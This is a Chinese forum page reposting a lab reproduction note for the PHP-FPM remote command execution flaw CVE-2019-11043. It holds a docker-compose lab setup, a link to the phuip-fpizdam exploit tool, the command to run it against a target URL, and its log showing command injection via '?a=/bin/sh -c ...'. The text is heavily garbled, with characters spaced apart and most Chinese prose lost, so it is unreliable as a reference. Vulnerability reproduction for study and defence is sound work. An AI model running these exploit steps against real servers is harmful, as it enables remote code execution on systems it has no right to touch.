搜索

[28275] 2020-04-28_PHP-FPM远程命令执行(CVE-2019-11043)

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2020-04-28_PHP-FPM远程命令执行(CVE-2019-11043) P H P - F P M C V E - 2 0 1 9 - 1 1 0 4 3   O t s   2 0 2 0 - 0 4 - 2 8   R e a l   W o r l d   C T F     A n d r e w   D a n a u     C T F     U R L   % 0 a   使 N g i n x P H P - F P M N g i n x P H P d o c k e r - c o m p o s e   u p   - d 访 h t t p : / / y o u r - i p : 8 0 8 0 / i n d e x . p h p 使 h t t p s : / / g i t h u b . c o m / n e e x / p h u i p - f p i z d a m 访 h t t p : / / y o u r - i p : 8 0 8 0 / i n d e x . p h p ? a = i d p h p - f p m 访 / i n d e x . p h p ? a = i d 访 访 h t t p s : / / b u g s . p h p . n e t / b u g . p h p ? i d = 7 8 5 9 9 h t t p s : / / l a b . w a l l a r m . c o m / p h p - r e m o t e - c o d e - e x e c u t i o n - 0 - d a y - d i s c o v e r e d - i n - r e a l - w o r l d - c t f - e x e r c i s e / h t t p s : / / g i t h u b . c o m / n e e x / p h u i p - f p i z d a m $   g o   r u n   .   " h t t p : / / y o u r - i p : 8 0 8 0 / i n d e x . p h p " 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 0   B a s e   s t a t u s   c o d e   i s   2 0 0 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 0   S t a t u s   c o d e   5 0 2   f o r   q s l = 1 7 9 5 ,   a d d i n g   a s   a   c a n d i d a t e 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 0   T h e   t a r g e t   i s   p r o b a b l y   v u l n e r a b l e .   P o s s i b l e   Q S L s :   [ 1 7 8 5   1 7 9 0   1 7 9 5 ] 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   A t t a c k   p a r a m s   f o u n d :   - - q s l   1 7 9 0   - - p i s o s   1 5 2   - - s k i p - d e t e c t 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   T r y i n g   t o   s e t   " s e s s i o n . a u t o _ s t a r t = 0 " . . . 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   D e t e c t ( )   r e t u r n e d   a t t a c k   p a r a m s :   - - q s l   1 7 9 0   - - p i s o s   1 5 2   - - s k i p - d e t e c t   < - -   R E M E M B E R   T H I S 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   P e r f o r m i n g   a t t a c k   u s i n g   p h p . i n i   s e t t i n g s . . . 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   S u c c e s s !   W a s   a b l e   t o   e x e c u t e   a   c o m m a n d   b y   a p p e n d i n g   " ? a = / b i n / s h + - c + ' w h i c h + w h i c h ' & "   t o   U R L s 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   T r y i n g   t o   c l e a n u p   / t m p / a . . . 2 0 1 9 / 1 0 / 2 3   1 9 : 4 1 : 0 2   D o n e !

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理